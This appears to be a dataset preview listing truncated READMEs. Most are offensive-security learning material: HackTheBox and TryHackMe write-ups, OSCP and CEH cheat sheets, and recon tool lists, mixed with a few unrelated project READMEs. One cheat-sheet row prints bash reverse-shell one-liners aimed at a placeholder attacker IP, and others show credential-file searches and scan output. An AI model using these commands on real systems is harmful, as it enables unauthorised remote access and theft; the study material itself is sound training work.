text stringlengths 9 334k |
|---|
[](https://travis-ci.org/rg3/youtube-dl)
youtube-dl - download videos from youtube.com or other video platforms
- [INSTALLATION](#installation)
- [DESCRIPTION](#description)
- [OPTIONS](#options)
- [CONFIGURATION](#configuration)
- [OUTPUT TEMPLAT... |
# Late - HackTheBox - Writeup
Linux, 20 Base Points, Easy

## Machine

## TL;DR
To solve this machine, we begin by enumerating open services using ```namp``` – finding ports ```22``` and ```80```.
***User***: Found another subdomain ```images.late.htb``` ... |
# Peak Hill
Exercises in Python library abuse and some exploitation techniques
[Peak Hill](https://tryhackme.com/room/peakhill)
## Topic's
- Network Enumeration
- FTP Enumeration
- Cryptography
- Binary
- Python Scripting (Decoder)
- Reverse Enginierung
- Misconfigured Binaries
## Appendix archive
Password: `1 ... |
ldap protocol, underlying protocol for AD
389 is a ldap port that would be open
distinguished name for domain controller
book.hactricks.xyz/network-services-pentesting/pentesting-ldap
authentication required in case of accessing data
ldap search for enumeration can run without user requirement
https://book.hacktr... |
```pr0xh4ck © 2023```

<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#ip-test">IP Check</a></li>
<li><a href="#dns">DNS</a></li>
<li><a href="#internet-search-engine-discovery">Internet Search Engine Discovery<... |
# My OSCP Journey
It seems to be a tradition to write a cheesy 🧀 blog post after you've earned your OSCP, here I am.
TLDR:
- Laughed at people calling it a 'journey'
- Failed, reconsidered the whole 'journey' thing
- Got more motivation from failing than ever before
- Passed
## Background
I'm a Software Engineer by ... |
HackTheBox Walkthrough - Lemon
===
This post is writeup of the HackTheBox machine created by ch4p.
## Nmsp
Nmap result
```sh
# nmap -sV -sC --script=vuln 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-28 12:27 EDT
Nmap scan report for 10.10.10.4
Host is up (0.32s latency).
Not shown: 997 filtered port... |
# Developer - HackTheBox - Writeup
Linux, 40 Base Points, Hard

## Machine

## Developer Solution
### User
Let's start with ```nmap``` scanning:
```console
┌─[evyatar@parrot]─[/hackthebox/Developer]
└──╼ $ nmap -sV -sC -oA nmap/Developer 10.10.1... |
## oscp
I passed the Offensive Security Certified Professional (OSCP) exam on 2 September 2021 using this [cheat-sheet](/cheatsheets/README.md) and a number of other online resources.
### Table of Contents
* [Bootstraps](/bootstraps/)
* [goshell](/bootstraps/goshell.go)
* [new-ctf](/bootstraps/new-ctf.sh)
* [sup... |
# Helpful Tech Resources
_Disclaimer: Please don't get stuck in 'tutorial hell'. Try to execute what you learned in a project or task of your own and then move on to the next interesting thing.<br>_
Over the last few months I spent a lot of time on social media, collecting all kinds of interesting, educational, and he... |
## CHEATSHEET
### Linux
Find user owned files
~~~
find / -user $(whoami) 2>/dev/null | egrep -v '(/proc)'
~~~
Find writeable files
~~~
find / -writeable 2>/dev/null | egrep -v '(/proc|/run|/dev)'
~~~
Find readable files with following extensions
~~~
find / -readable 2>/dev/null | egrep '(\.key$|\.pub$|\.bak$|\.crt$|... |
# Pentest Tools

The tools listed below are commonly used in penetration testing, and the tool catalog is referenced from Kali Tools, most of which are open source software. The project long-term supplementary update QAQ
## TODO
* [x] Directory
* [ ] Source Code
* [ ] Documentation
## List
* ... |
# GoVanguard InfoSec Encyclopedia
This is an ongoing compilation of resources we have found helpful and tools we use.
If you're new to InfoSec and are looking for a concentrated list of resources to get started, check out [Getting into InfoSec and Cybersecurity](https://github.com/GoVanguard/Getting-into-InfoSec-and-C... |
## Pentest and bugbounty tools
Useful things from my pentest-learning-OSCP-failing-brickwall-headbutting journey
[Pentest tools list](https://github.com/6x86/tools/blob/master/pentest_tools.md) \
[Pentest commands list](https://github.com/6x86/tools/blob/master/pentest_commands.md) - not as organised as I'd like. \
Bu... |
***项目简介***
信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上再做持久化控制)、擦痕迹。
***
# 安全相关资源列表
- https://arxiv.org 康奈尔大学(Cornell University)开放文档
- https://github.com/sindresorhus/awesome awesome系列
- http://www.owasp.org.cn/owasp-project/owasp-things OWASP项目
- http://www.irongeek.com/i.php?page=security/hackingillustrated ... |

A reconnaissance tool made for the OSCP labs to automate information gathering and service enumeration whilst creating a directory structure to store results, findings and exploits used for each host, recommended commands to... |
# Resources
## Introduction
This is a collection of resources for learning computing security. They are mostly interactive, but some sections may contain reading or tools that I feel are worth including. This is not meant to be comprehensive whatsoever, this is meant to just be a collection of stuff that people have f... |
<!-- markdownlint-disable MD033 MD041 -->
<p align="center">
<a href="https://hub.docker.com/r/aaaguirrep/offensive-docker">
<img
alt="Offensive Docker"
src="https://github.com/aaaguirrep/offensive-docker/blob/master/img/banner.jpg"
width="600"
/>
</a>
</p>
<br/>
<p align="center">
<a h... |
# Information Collection For Pentest
## 声明
```
Author: Qftm
Date: 2020/01/18
```
## 正文
"只有不努力的黑客,没有攻不破的系统"。
在SRC漏洞挖掘或渗透测试中,信息收集占很大一部分,能收集到别人收集不到的资产,就能挖到别人挖不到的洞。
Table of Contents
=================
- [收集域名信息](#收集域名信息)
- [Whois 查询](#whois-查询)
- [备案信息查询](#备案信息查询)
- [信用信息查询](#信用信息查询)
- [IP... |
<h1 align="center">
<br>
<a href="https://github.com/six2dez/reconftw"><img src="https://github.com/six2dez/reconftw/blob/main/images/banner.png" alt="reconftw"></a>
<br>
reconFTW
<br>
</h1>
<p align="center">
<a href="https://github.com/six2dez/reconftw/releases/tag/v2.6">
<img src="https://... |
# HackTheBox
For OSCP preparation!
## CheatSheet
* [Reverse shell](#Reverse)
* [Powershell Cheatsheet](#PSCheat)
* [Metasploit Setup](#Metasploit)
### Bash
```bash
bash -i >& /dev/tcp/{IP}}/{PORT}} 0>&1
sh -i >& /dev/udp/{IP}/{PORT}} 0>&1
0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&... |
# Nuclear Pond
<img src="assets/logo.png" width="400" height="300" align="right">
Nuclear Pond is used to leverage [Nuclei](https://github.com/projectdiscovery/nuclei) in the cloud with unremarkable speed, flexibility, and perform internet wide scans for far less than a cup of coffee.
It leverages [AWS Lambda](htt... |
# awesome-bbht
A bash script that will automatically install a list of bug hunting tools I sometimes use for recon, exploitation, etc. (minus burp.) (Contributions are always welcome.)
## Install
```sh
git clone https://github.com/0xApt/awesome-bbht.sh
cd awesome-bbht
chmod +x awesome-bbht.sh
sudo ./awesome-bbht.sh
... |
## Arthas

[](https://travis-ci.org/alibaba/arthas)
[](https://codecov.io/gh/alibaba/arthas)
](https://creativecommons.org/licenses/by-sa/4.0/)
<a name="contents"></a>
## 🔖 Contents
- ☀️ [Methodology](#methodology)
* ⚙️ [Phase 0: Recon](#mrecon)
* ⚙️ [Phase 1: Enumerate](#menum... |
# Pentest notes
Neat commands, code snippets and links to use during the tests.
## Table of Contents
* [Free Trainings](#free-trainings)
* [Red Teaming](#red-teaming)
* [Clouds](#clouds)
* [AppSec](#appsec)
* [Protection and Hardening](#protection-and-hardening)
------
## Free Trainings
https://p.ost2.fyi/
https:/... |
# [Break out of the Cage](https://tryhackme.com/room/breakoutthecage1) TryHackMe Room

IP=`10.10.103.237`
Ports
```
nmap -sV -sC -v $IP -oN initial.nmap
nmap -p- -T4 -v $IP -oN all_ports.nmap
21 ftp
22 ssh
80 ... |
# Grandpa
#### 10.10.10.14
###### Solved by: Dotaplayer365 and revdev
```{r, engine='bash', count_lines}
nmap -T4 -A -v 10.10.10.14
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST... |
# WEEKLY INFOSEC UPDATE : v0.7
- An initiative by [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/What-Is-RESETHACKER)


](https://goreportcard.com/report/github.com/c-sto/recursebuster)

It's like gobuster, but recursive!
I wanted a recursive directory brute forcer that was fast, and had c... |
# Dictionary-Of-Pentesting
## 简介
收集一些常用的字典,用于渗透测试、SRC漏洞挖掘、爆破、Fuzzing等实战中。
收集以实用为原则。目前主要分类有认证类、文件路径类、端口类、域名类、无线类、正则类。
涉及的内容包含设备默认密码、文件路径、通用默认密码、HTTP参数、HTTP请求头、正则、应用服务默认密码、子域名、用户名、系统密码、Wifi密码等。
该项目计划持续收集。
## 更新记录
**2022.07.16**
1. k8s 路径
2. phpunit路径
3. properties 文件路径字典
4. yaml文件名字典
5. 用户名字段名称字典
**2022.05.08**
... |
.png)

- A Collection for IoT Security Resources
- You are welcome to fork and [contribute](https://github.com/V33RU/IoTSecurity101/blob... |
# Resources from JCTF
* Ceremony Slides
* Backend Web Code
* Some Speaker Notes
## Ceremony Slides
<!-- More like Ceremoney -->
* [JerseyCTF Opening Ceremony](https://docs.google.com/presentation/d/1kF8u1f4Vr4wr1c_JM5Ct8yQSILD22Bx2WwYI49L7sDs/edit#slide=id.p)
* [JerseyCTF Closing Ceremony](https://docs.google.com/pres... |
# Awesome-Smart-Contract-Security 

# Table of Contents
- [Blogs](#blogs)
- [Papers](#papers)
- [Books](#books)
- [Trainings](#Trainings)
- [Tools](#tools)
* [Visualization](#Visualization)
* [Verification](#Verification)
* [Linters](#L... |
# Overview
This directory contains source code for PHP implementation of gRPC layered on
shared C library. The same installation guides with more examples and
tutorials can be seen at [grpc.io](https://grpc.io/docs/quickstart/php.html).
gRPC PHP installation instructions for Google Cloud Platform is in
[cloud.google.... |
# Information Collection For Pentest
## 声明
```
Author:Qftm
Data:2020/01/18
Link:https://github.com/Qftm/Information_Collection_Handbook
```
## 正文
"只有不努力的黑客,没有攻不破的系统"。
在SRC漏洞挖掘或渗透测试中,信息收集占很大一部分,能收集到别人收集不到的资产,就能挖到别人挖不到的洞。
Table of Contents
=================
- [收集域名信息](#收集域名信息)
- [Whois 查询](#whois-查询)
... |
<h1 align="center">
<br>
<a href="https://github.com/six2dez/reconftw"><img src="https://github.com/six2dez/reconftw/blob/main/images/banner.png" alt="reconftw"></a>
<br>
reconFTW
<br>
</h1>
<p align="center">
<a href="https://github.com/six2dez/reconftw/releases/tag/v2.1.4">
<img src="https://img.shi... |
# What is it?
RTFM is a great and useful book, BUT a bit pointless when you have to transcribe it, so this little program will aim to be the spiritual successor to it.
I would recommend picking up a copy of the book from Amazon, it is pretty handy to have!
# Quick Start
```
Download, Update, Look for something!
$ c... |
# OpenPhalanX: No one stands alone
OpenPhalanX is a comprehensive toolkit designed to secure remote systems. Whether you're an IT professional seeking to automate system tasks, or a cybersecurity specialist handling incident response, OpenPhalanX offers an array of features to streamline your operations. This project ... |
# SRC-experience
工欲善其事,必先利其器
~~最近收集到的一些src挖掘奇技淫巧,然后还有一些国外新技术的学习网站分享给大家。~~
2021.10.20: 时隔两年更新下文章。
**Bug Bounty trick website**
<https://www.bugbountynotes.com/training>
<https://pentester.land/newsletter/2019/02/12/the-5-hacking-newsletter-40.html>
<https://www.openbugbounty.org/>
**hackerone-reports**
[hackero... |
[](https://sn1persecurity.com)
[](https://github.com/1N3/Sn1per/releases)
[
--- | ---
**1** | Linux Distributions
**2** | Ethical Alternative for tools
**3** | Bug Bounty platforms
**4** | Practice platform
*... |
# Soccer - HackTheBox - Writeup
Linux, 20 Base Points, Easy

## Machine

## TL;DR
To solve this machine, we begin by enumerating open services using ```namp``` – finding ports ```22```, ```80``` and ```9091```.
***User***:
Using `gobuster` we found `... |
# Support - HackTheBox - Writeup
Windows, 20 Base Points, Easy

## Machine

## TL;DR
***User***: By enumerating the SMB shares we found the file ```UserInfo.exe.zip``` on ```support-tools``` share, By decompiling the file using ```dnSpy``` we found t... |
# awesome-web-hacking
This list is for anyone wishing to learn about web application security but do not have a starting point.
You can help by sending Pull Requests to add more information.
If you're not inclined to make PRs you can tweet me at `@infoslack`
Table of Contents
=================
* [Books](#books)
... |
<h1 align="center">Wordlists <a href="https://twitter.com/intent/tweet?text=Wordlists%20-%20Real-world%20infosec%20wordlists%2C%20updated%20regularly%20by%20%40trick3st%0A%0Ahttps%3A%2F%2Fgithub.com%2Ftrickest%2Fwordlists&hashtags=bugbounty,bugbountytips,infosec"><img src="https://img.shields.io/badge/Tweet--lightgrey?... |
# Nmap | https://tryhackme.com/room/rpnmap
### [Task 2] Nmap Quiz
#1 First, how do you access the help menu? : `-h`
#2 Often referred to as a stealth scan, what is the first switch listed for a 'Syn Scan'? : `-sS`
#3 Not quite as useful but how about a 'UDP Scan'? : `-sU`
#4 What about operat... |
### IP
`10.10.11.214`
# Reconnaissance
### nmap
`sudo nmap -sC -sV `
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 91bf44edea1e3224301f532cea71e5ef (RSA)
| 256 8486a6e204abdff71d456ccf395809de (ECDSA)
|_ 256 1aa895... |
[](https://tabby.sh)
<p align="center">
<a href="https://github.com/Eugeny/tabby/releases/latest"><img alt="GitHub All Releases" src="https://img.shields.io/github/downloads/eugeny/tabby/total.svg?label=DOWNLOADS&logo=github&style=for-the-badge"></a> <a href="https://nightly.link/Eugeny/t... |
NOTE
====
[Andrwjkerr](https://github.com/andrewjkerr/security-cheatsheets) forked repository for
[www.sniferl4bs.com](www.sniferl4bs.com)
The fork was done because the original author has not updated about 2 years ago.
Security Cheatsheets
====================
These security cheatsheets are part of a project for ... |
# Active
URL: https://app.hackthebox.com/machines/Active
Level: Easy
Date 3 Aug 2020
## Walkthrough
- [Enumeration](#enumeration)
- [Kerberoasting](#kerberoasting)
- [Admnistrator shell](#shell)
# Enumeration
## NMAP
Let's start with a basic nmap scan:
```
root@kali:/opt/htb/Active# nmap -T5 10.10.10.100
Start... |
# RopMe: ret2libc
**[SEE VIDEO WALKTHROUGH HERE](https://youtu.be/AaKLMc_J9z8)** |
# Writer - HackTheBox - Writeup
Linux, 30 Base Points, Medium

## Machine

## TL;DR
To solve this machine, we begin by enumerating open services using ```namp``` – finding ports ```22```, ```80```,```139``` and ```445```.
***User 1***: Discovering admi... |
# Use the cheatsheets locally
Run the `setup.sh` script to call each cheatsheet without a path. <br>
```bash
git clone https://github.com/ChronosPK/pentesting-cheatsheets.git
cd pentesting-cheatsheet
sudo ./setup.sh
```
If you want to view the cheatsheets using a certain file editor like `subl`, <br>
give the absolu... |
# Hack The Box
## Entry
The task is to find the an interesting script. It goes as `view-source:https://www.hackthebox.eu/js/inviteapi.min.js`.
```js
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return... |
Table of Contents
=================
- [Purpose](#purpose)
- [Environment](#environment)
- [Warning](#warning)
- [Quick Install](#quick-install)
* [Configuration](#configuration)
* [Installation](#installation)
- [Run Security Check](#run-security-check)
* [Basic os check](#basic-os-check)
- [Installed Packages](#... |

[](https://badge.fury.io/rb/wpscan)
[](https://travis-ci.or... |
# CTF_resources
Hi, guys. In this repo, ill be posting resources related to different categories of CTF challenges.
I use Ubuntu to solve chals.
It is a Linux environment using BASH (Bourne Again Shell) i.e a shell and command language interpreter for a GNU operating system.
HELPFUL PLAYLIST:
https://www.yout... |
# [ OWASP Amass](https://owasp.org/www-project-amass/)
<p align="center">
<img src="https://github.com/owasp-amass/amass/blob/master/images/amass_video.gif">
</p>
[](https://owasp.org/projects/#s... |
# AllThingsSSRF
**This is a collection of writeups, cheatsheets, videos, related to SSRF in one single location**
This is currently work in progress I will add more resources as I find them.

### Created By [@jdonsec](https://twitter.com/jdonsec)
---
#### Learn What is SSRF
- [Vickie ... |
<img src="CEH-PRACTICAL-9-7-2022 (1).png" />
# Reconnasiance/Footprinting
<details>
<summary>Recon</summary>
* -r range , Scan Entire Network for ALive host using ARP
```console
:~$ netdiscove... |
<h1 align="center"> 👑 What is KingOfBugBounty Project </h1>
Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the... |
## 👑 What is KingOfOneLineTips Project ? 👑
Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understan... |
# Dictionary-Of-Pentesting
## 简介
收集一些常用的字典,用于渗透测试、SRC漏洞挖掘、爆破、Fuzzing等实战中。
收集以实用为原则。目前主要分类有认证类、文件路径类、端口类、域名类、无线类、正则类。
涉及的内容包含设备默认密码、文件路径、通用默认密码、HTTP参数、HTTP请求头、正则、应用服务默认密码、子域名、用户名、系统密码、Wifi密码等。
该项目计划持续收集,也欢迎感兴趣的大佬一起来完善。可直接提交PR,也可以提建议到issue。
## 更新记录
**2021.01.04**
1. 增加DefaultCreds-cheat-sheet
**2021.01.03**
1.... |
# CEH-Practical-Guide
This Repo will help you to prepare better for CEH - Practical Exam
### Exam Information
- Exam Title: Certified Ethical Hacker (Practical)
- Number of Challenges: 20
- Duration: 6 hours
- Passing Score: 70% (14 Questions)
----------------------------------------------------------
### My Ex... |
<div align="center" style="font-size: 25px;">
## General 📚
</div>
## CTFs
- [What is CTF?](https://www.youtube.com/watch?v=8ev9ZX9J45A) \- A video by LiveOverFlow introducing the idea of security Capture The Flag competitions.
- [CTFtime](https://ctftime.org/) \- A site all about CTFs, with information on CTF team... |
# Psycho Break
Help Sebastian and his team of investigators to withstand the dangers that come ahead.
[Psycho Break](https://tryhackme.com/room/psychobreak)
## Topic's
- Network Enumeration
- Web Poking
- Cryptography
- Vigenère
- Morse Code (Audio)
- OSINT
- Web Enumeration
- Directory Traversal
- Reverse Engi... |
# OSCP in One Month
## Study Materials
### https://github.com/akenofu/OSCP-Cheat-Sheet
### https://cd6629.gitbook.io/ctfwriteups/cheatsheets/oscp-cheatsheet-unfinished
### https://casvancooten.com/posts/2020/05/oscp-cheat-sheet-and-command-reference/
### https://www.noobsec.net/oscp-cheatsheet/
### https://liodeu... |
# 所有收集类项目:
- [收集的所有开源工具: sec-tool-list](https://github.com/alphaSeclab/sec-tool-list): 超过18K, 包括Markdown和Json两种格式
- [全平台逆向资源: awesome-reverse-engineering](https://github.com/alphaSeclab/awesome-reverse-engineering):
- Windows平台安全: PE/DLL/DLL-Injection/Dll-Hijack/Dll-Load/UAC-Bypass/Sysmon/AppLocker/ETW/WSL/.NET/Pro... |
# Super Tiny Icons
Under 1KB each! Super Tiny Web Icons are minuscule SVG versions of your favourite logos. The average size is _under_ 582 bytes!
The logos have a 512x512 viewbox, they will fit in a circle with radius 256. They will scale up and down to suit your needs.
Say thanks!
[ with [Yarn](https://yarnpkg.com/lang/en/docs/cli/create/) or [npx](https://github.com/zkat/npx#readme) to bootstrap the example:
```bash
npx create-next-app --example w... |
# Docker images for Parrot OS
Docker is a powerful technology that allows users to run containers universally on any host platform.
Docker uses template images, and allows the user to start several instances of the same template, destroy them, or build new custom templates on top of them.
Parrot uses docker to allow... |
# Bug Bounty Reference
A list of bug bounty write-up that is categorized by the bug nature, this is inspired by https://github.com/djadmin/awesome-bug-bounty
# Introduction
I have been reading for Bug Bounty write-ups for a few months, I found it extremely useful to read relevant write-up when I found a certain type... |
# hacking-snippets
Useful snippets and links for hacking competitions. Work in progress
# Table of Contents
1. [Recconnaissance](#Recconnaissance)
2. [Enumeration](#Enumeration)
3. [Exploitation](#Exploitation)
4. [PrivEsc](#PrivEsc)
## Recconnaissance
### Useful links
- [peoplefinder](https://peoplefinder.com) - ... |
[](https://discord.gg/ceMXzhfaka)
To join **DEVs Dungeon** GitHub Organization, click [here](https://github.com/Devs-Dungeon/support/issues/new?assignees=&labels=invite+me+to+the+organisation&template=invitation.yml&title=Pleas... |
# Cyber Resources
-> by Freddie
This is a collection of all the best resources I've learnt from and used in the past year of my cyber security learning.
This is in no means a complete list, and will be updated consistently when I come across new content, or simply remember platforms I used to use.
I'll try and so... |
# Project tree
.
* [Everything-OSCP](./Everything-OSCP)
* [Checklists](./Everything-OSCP/Checklists)
* [Linux Post exploitation](./Everything-OSCP/Linux Post exploitation)
* [Windows buffer overflow](./Everything-OSCP/Windows buffer overflow)
* [Windows Post exploitation](./Everything-OSCP/Windows Post ex... |
## Bugbounty Resources
### cheat sheets
- [account takeover checklist](https://github.com/aufzayed/bugbounty/blob/main/account_takeover_checklist.md)
- [remote code execution checklist](https://github.com/aufzayed/bugbounty/blob/main/remote_code_execution_checklist.md)
- [web applications fingerprinting tools](https:... |
# Hacking-and-CTF-Cheat-Sheet
This is my collection of Commands and Syntax for all utils i use when trying to hack CTF's challanges,
maybe it can help others...
Enjoy
@hasamba
# Hacking Cheat Sheet
# Reconnaissance (Information Gathering)
- [hunter.io](https://hunter.io/) - known email and users for a specific dom... |
# Awesome Cybersecurity Blue Team [](https://awesome.re)
> A collection of awesome resources, tools, and other shiny things for cybersecurity blue teams.
[Cybersecurity blue teams](https://en.wikipedia.org/wiki/Blue_team_(computer_security)) are groups of individuals who ... |
## OG Repo
https://github.com/cipher387/Dorks-collections-list
<h1>Dorks collections list</h1>
<p>List of Github repositories and articles with list of dorks for different search engines</p>
<div align="center">
<img alt="GitHub stars" src="https://img.shields.io/github/stars/cipher387/Dorks-collections-list">
<im... |
<p align='center'>
<img src="https://i.imgur.com/n2U6nVH.png" alt="Logo"> <br>
<img src="https://img.shields.io/badge/Version-1.0.5-brightgreen.svg?style=style=flat-square" alt="version">
<img src="https://img.shields.io/badge/python-3-orange.svg?style=style=flat-square" alt="Python Version">
<img src="http... |
[](https://travis-ci.org/sqshq/PiggyMetrics)
[](https://codecov.io/github/sqshq/PiggyMetrics?branch=master)
[

# Table of Contents
- [Blog](#blog)
- [How To's](#how-tos)
- [Paper](#paper)
- [Books](#books)
- [Course](#course)
- [Tools](#tools)
* [Static Analysis Tools](#Static-Analysis)
* [Dynamic Analysi... |
# PT𓀮EH
**Notes about Penetration Testing and Ethical Hackin.**

---
[REED](https://github.com/bmedicke/REED) | PTEH
---
# toc
<!-- vim-markdown-toc GFM -->
* [the pentest process](#the-pentest-process)
* [pre-engagement interactions](#pre-engagement-inter... |
# Node Version Manager [][3] [][4] [](https://bestpractices.coreinfrastructure.org/projects/... |
# VHostScan
A virtual host scanner that can be used with pivot tools, detect catch-all scenarios, aliases and dynamic default pages. First presented at SecTalks BNE in September 2017 ([slidedeck](https://docs.google.com/presentation/d/1KDY7bnCpCGabJn8UpmHGSb6z_hi_WGf3ETxzykTNjWY)).
[
- [RBAC Configuration](#rbac-configuration)
... |
# Cheatsheet
Cosas copypaste
# OSINT
## Email discovering
Email addresses and patterns of a company
```
hunter.io
```
Email addresses, domains and URLs of a website
```
phonebook.cz
```
Verify emails
```
tools.emailhippo.com
```
## Breached emails
Confirmation of breached emails
```
haveibeenpwned.com
```
Breach... |

### OSCP Exam now has some major changes .... Those are -


*Ping Sweep*
namp -v -sn 10.11.1.1-254 -oG ping sweep.txt
grep Up ping-sweep.txt | cut -d “ ” -f 2
**Find... |
# Scripts
## Recon
```bash
#!/bin/bash
export rhost=""
export dir_wordlist="/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt"
# Check if $rhost variable is empty
if [ -z "$rhost" ]; then
echo "Please enter the value for \$rhost:"
read rhost
fi
# Check if directory wordlist exists
if [... |
# Awesome-Redteam
**【免责声明】本项目所涉及的技术、思路和工具仅供学习,任何人不得将其用于非法用途和盈利,不得将其用于非授权渗透测试,否则后果自行承担,与本项目无关。使用本项目前请先阅读 [法律法规](https://github.com/Threekiii/Awesome-Laws)。**
## 快速导航
- [攻防渗透常用命令](https://github.com/Threekiii/Awesome-Redteam/blob/master/cheatsheets/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%... |
<img src="https://cdn.rawgit.com/detailyang/awesome-cheatsheet/master/awesome.svg" alt="awesome" width="120" align="right" >
# Awesome Cheatsheet
[](https://github.com/sindresorhus/awesome) 
## Sau is still an active machine, A [Full writeup](Sau-Writeup.pdf) is available, Access to the writeup requires the root hash as the password.
Telegram: [@evyatar9](https://t.me/evyatar9)
Discord: [evyatar9#5800](https://discord... |
# Gobuster
Gobuster is a tool used to brute-force:
- URIs (directories and files) in web sites.
- DNS subdomains (with wildcard support).
- Virtual Host names on target web servers.
- Open Amazon S3 buckets
- Open Google Cloud buckets
- TFTP servers
## Tags, Statuses, etc
[![Build Status](https://travis-ci.com/OJ/g... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.